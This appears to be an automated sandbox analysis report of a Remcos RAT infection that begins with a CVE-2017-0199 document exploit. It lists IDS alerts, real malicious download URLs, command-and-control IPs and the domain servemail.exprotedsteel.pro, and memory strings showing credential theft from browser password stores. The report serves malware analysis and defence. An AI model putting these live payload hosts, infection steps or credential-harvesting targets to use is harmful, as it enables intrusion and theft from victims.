                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49175 -> 45.90.89.98:6498
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49174 -> 45.90.89.98:6498
                  Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 85.215.206.82:80 -> 192.168.2.22:49173
                  Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 85.215.206.82:80 -> 192.168.2.22:49173
                  Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 216.58.212.129:443 -> 192.168.2.22:49172
                  Source: Malware configuration extractorURLs: servemail.exprotedsteel.pro
                  Source: Yara matchFile source: 19.2.powershell.exe.672aae8.0.raw.unpack, type: UNPACKEDPE
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 45.90.89.98:6498
                  Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /270/WRFFDCE.txt HTTP/1.1Host: 85.215.206.82Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 45.90.89.98 45.90.89.98
                  Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                  Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
                  Source: Joe Sandbox ViewASN Name: TWC-12271-NYCUS TWC-12271-NYCUS
                  Source: Joe Sandbox ViewASN Name: STRATOSTRATOAGDE STRATOSTRATOAGDE
                  Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                  Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49176 -> 178.237.33.50:80
                  Source: global trafficHTTP traffic detected: GET /clm3hy?&sing=cuddly&brain=hapless&kingfish=perpetual&cake=scientific&bacon=kindhearted&jelly=pumped&reveal=reflective&clock=agonizing&yak HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: u4u.kidsConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /270/weg/wg/deethebestthingwithmegreatattirudewithgreatthigns_________eniterlifewithgreatniceworkingskillwithmebgreatthignstobe________verynicepersonentiterlifewithnewthisnfds.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 85.215.206.82Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /270/weg/wennedgreatthingswithgoodnwesforentrielifewithnew.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 85.215.206.82Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /270/igetbestthingswithbestpicturewithgreatthingsonme.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 85.215.206.82Connection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49162 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49163 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49164 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.22:49171 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 216.58.212.129:443 -> 192.168.2.22:49172 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00754548 URLDownloadToFileW,11_2_00754548
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C04F3BA9-D42B-4460-B369-5ADD06F8F9F6}.tmpJump to behavior
                  Source: global trafficHTTP traffic detected: GET /clm3hy?&sing=cuddly&brain=hapless&kingfish=perpetual&cake=scientific&bacon=kindhearted&jelly=pumped&reveal=reflective&clock=agonizing&yak HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: u4u.kidsConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /270/weg/wg/deethebestthingwithmegreatattirudewithgreatthigns_________eniterlifewithgreatniceworkingskillwithmebgreatthignstobe________verynicepersonentiterlifewithnewthisnfds.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 85.215.206.82Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /270/weg/wennedgreatthingswithgoodnwesforentrielifewithnew.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 85.215.206.82Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /270/igetbestthingswithbestpicturewithgreatthingsonme.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 85.215.206.82Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /270/WRFFDCE.txt HTTP/1.1Host: 85.215.206.82Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
                  Source: CasPol.exe, 00000018.00000002.527130707.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                  Source: CasPol.exe, CasPol.exe, 00000018.00000002.527130707.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                  Source: CasPol.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: CasPol.exe, 00000016.00000002.531793309.0000000001D6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login102 FROM nssPrivatekey3.dbkey4.dbSELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from loginsLocal Stateos_cryptencrypted_keyDPAPICredReadACredFreeCredDeleteACredEnumerateACredEnumerateWSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2pstorec.dllPStoreCreateInstancehostnameencryptedUsernameencryptedPasswordusernameFieldpasswordFieldhttpRealmtimeCreatedtimeLastUsedtimePasswordChangedtimesUsedSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword, timeCreated, timeLastUsed, timePasswordChanged, timesUsed FROM moz_loginssignons.txtsignons2.txtsignons3.txtsignons.sqlitelogins.jsoncrypt32.dllCryptUnprotectDataadvapi32.dllCryptAcquireContextCryptReleaseContextCryptCreateHashCryptGetHashParamCryptHashDataCryptDestroyHashCryptDecryptCryptDeriveKeyCryptImportKeyCryptDestroyKeyinternet explorerwininetcachecredentialsdpapi:"Account","Login Name","Password","Web Site","Comments"name,url,username,passwordWeb DataLogin Datafirefox.exeData\ProfileYandex\YandexBrowser\User Data\Default\Login DataVivaldi\User Data\Default\Login DataMicrosoftEdge*User DataGoogle\Chrome\User DataGoogle\Chrome SxS\User DataChromium\User DataLogin DataOpera\Opera\wand.datOpera\Opera7\profile\wand.datOperawand.datOpera Software\Opera Stable\Login Dataabe2869f-9b47-4cd9-a358-c22904dba7f7Microsoft_WinInetMicrosoft_WinInet_ ShowGridLinesSaveFilterIndexShowInfoTipMarkOddEvenRowsShowTimeInGMTLoadPasswordsIELoadPasswordsFirefoxLoadPasswordsChromeLoadPasswordsOperaLoadPasswordsSafariLoadPasswordsSeaMonkeyLoadPasswordsYandexLoadPasswordsVivaldiLoadPasswordsWaterfoxUseFirefoxProfileFolderUseFirefoxInstallFolder equals www.facebook.com 